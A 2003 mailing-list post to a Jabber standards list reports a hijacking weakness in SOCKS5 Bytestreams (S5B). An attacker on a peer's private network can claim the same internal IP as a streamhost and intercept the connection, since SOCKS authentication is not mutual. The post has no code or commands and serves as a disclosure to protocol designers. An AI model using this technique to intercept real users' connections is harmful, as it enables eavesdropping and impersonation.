[standards-jig] S5B vulnerability

Justin Karneges justin-keyword-jabber.093179 at affinix.com
Sun Dec 7 05:52:13 UTC 2003

It seems that it is possible to hijack a connection rather easily with S5B 
when there are two private networks involved.

Network 1 - external:, internal: 192.168.0.x
Client A -

Network 2 - external:, internal: 192.168.0.x
Client B -
Client C -

Client A wishes to contact Client B, and sends an S5B iq packet containing and as streamhosts.  Client C, the attacker, 
simply needs to set his machine's IP address to the same as Client A.  When 
Client B tries to connect to, it will end up connecting to the 
attacker.  Because the SOCKS authentication is not mutual, the attacker does 
not have to worry about providing any credentials to the target.

Please correct me if I am wrong.


More information about the Standards mailing list